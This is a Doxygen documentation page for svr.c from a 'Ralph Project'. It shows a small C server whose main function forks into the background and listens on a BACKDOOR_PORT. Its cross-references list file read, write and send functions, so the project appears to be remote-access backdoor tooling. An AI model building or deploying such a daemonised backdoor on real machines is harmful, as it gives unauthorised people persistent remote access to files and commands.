Ralph Project: src/svr.c File Reference
svr.c File Reference
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include "socket_tools.h"
#include "tools.h"
Functions
void bd_exit (void)
int main (int argc, char *argv[])
Variables
int sock =0
Function Documentation
bd_exit()
void bd_exit (void)
Definition at line 13 of file svr.c.
                  {
    if(sock) close(sock);
}
References sock.
Referenced by main().
main()
int main (int argc, char * argv[])
Definition at line 17 of file svr.c.
{
    if(fork()!=0) exit(0);
    atexit(bd_exit);
    sock=tcp_svr_create_socket(BACKDOOR_PORT);
    tcp_svr_select_n_handle(sock, 1, tcp_svr_handle_cli);
    if(sock) close(sock);
    return 0;
}
References BACKDOOR_PORT, bd_exit(), sock, tcp_svr_create_socket(), tcp_svr_handle_cli(), and tcp_svr_select_n_handle().
Variable Documentation
sock
int sock =0
Definition at line 11 of file svr.c.
Referenced by bd_exit(), cmd_n_data_send(), cmd_read(), cmd_send(), cmd_write(), main(), send_file(), tcp_cli_create_socket(), tcp_svr_create_socket(), and tcp_svr_select_n_handle().